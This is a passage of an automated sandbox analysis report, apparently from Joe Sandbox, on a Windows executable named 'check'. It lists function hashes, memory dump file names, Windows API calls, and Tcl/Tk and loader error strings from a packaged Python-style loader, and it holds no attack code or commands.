                                                                                                                                                                                                                • Instruction ID: e0c8e1abd3379927fb6189d1a976e2cf406f728c3c6e6c3484e36ae7f1e1f197
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C81B272A18B8546E7B4CF19944036A6A91FB65FB4F144235FA9E87BD9DF3CF5008B00
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 21aaab296e2e64a79b20cf98ea2699a9ab0529386423cc159892306e5cd43e00
                                                                                                                                                                                                                • Instruction ID: 5a791bbf128f299860060eca10f2e5296e205cc54aa55a9bfa2b3daaccb7cf65
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21aaab296e2e64a79b20cf98ea2699a9ab0529386423cc159892306e5cd43e00
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F61E472E18A5246FB648A68945063D6688AF61F74FA40A39F61DC3EC7DF7DF800C780
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                • Instruction ID: a30809e30264d80b66bb8d4ac89bf7c32e72d44b11ba4d472970f9aa4012b3b7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34516476A18E5186E7A58B29C05022833F0EB66F78F244235EA8D97795CF3EF853C740
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                • Instruction ID: ed5f733bf672f5650ccc79adb305e91d3e244f78f73701bd9adb8fae8f93b65b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33515476B14E5186E7A48B29C04022837E0EB66F78F644135EA8D97796DF3EF853C780
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                • Instruction ID: 37fb1ea26374eef94dfca6d4a737477b3310cb1bce05296f297faae650665de9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C517176A18E5286E7A48B29D44023877A1EB64F78F244131EE4D977A4CF3EF893C744
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                • Instruction ID: 3c19ccc48544bec61477d28bacd460b74672be0d8714fa8f2bb7466941509d27
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31514576F24A5185E7A48B29C04423877E1EB66F68F244131DE4D97799CF3EF842D740
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                • Instruction ID: 1108417b1bb83d55c445156e808b6895887e4cf5d7cea22d5acf7ff923053c5e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42515137A18E5586E7A48B29C04423837A1EBA5F68F244131EE4D977A5CF3EF853D740
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                • Instruction ID: 1a25b55bceb251a99a4cb63813f398a93bf39c69556916c9b0b7d4fb55c855fd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34517F36A18E61C6E7A58B29C05023827E1EB66F68F245131EE4D97796DF3EF843C740
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                • Instruction ID: 07685c03a199412398efd7051397ac779f8ff3c7babed83deec59126024dc8d0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3641626284BF4A05E9EA8B1805286B426809F32FB0F5853B4ED9DD73D7CD1DFD86C120
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                • Instruction ID: 267f68815881d1b3f3ff4bba7d79b2e0685f598f7a39fb651d8964275790098d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C41E172718E5582EF44CF6AE914169A3A5FB58FE0B49A436FE0DD7B58DE3DE0428300
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                • Instruction ID: af138763f416a34ffed9fe03c9c3460cdac1f3cb64aceb29870d82cb773d8b3e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA31A432719F8281E7A49F25684012DAAD9AB95FF0F144239FA5DD3BD6DF3CE0118704
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                • Instruction ID: bcbf677b9e97b4ceb171ddd7c2a3b2bd28503bb05b312b899fefda3d3d837e6d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6F044717186978ADBA8DF79A40262977D0F768790F80C839E989C3A14DE3CD1518F04
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                • Instruction ID: 6cbfb8e69ccb3c4f048c9ea494305469ca15fac32a51850809247d7c9295967b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5A0012190CC0AD0E6848F19A8900252224BB74B20B800431F00ED10B1AE3CF4089200
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                • API String ID: 199729137-3427451314
                                                                                                                                                                                                                • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                • Instruction ID: 4b8f4dc7cb51a7eb8ca81399835f8973ec7941ea96479027b60f21434e5af6f6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC02A87490DF0791FA55AF56A8105B822A9AF34F75F845831F82EC26AAFF3CF5498300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8E9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF61E8E45F4,00000000,00007FF61E8E1985), ref: 00007FF61E8E93C9
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00007FF61E8E86B7,?,?,00000000,00007FF61E8E3CBB), ref: 00007FF61E8E822C
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8E2810: MessageBoxW.USER32 ref: 00007FF61E8E28EA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                • API String ID: 1662231829-930877121
                                                                                                                                                                                                                • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                • Instruction ID: 233f0cb5c566d84db029d1aac6550005b174ae6dfbc0d653846f2d22081f94d6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E516921A3CE4245FA91DB66D8516BE6354AFB4FA0F444831FA0EC66D6EE7CF5048740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                • String ID: P%
                                                                                                                                                                                                                • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                • Instruction ID: 30a501a3fb86ce8cffb685b8ad6a65a00f8566d788088e41f8f16c4ecd30a874
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7551D736604BA186D6349F26A4181BAB7A1F7A8F71F004125EBDF83795EF3CE145DB10
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
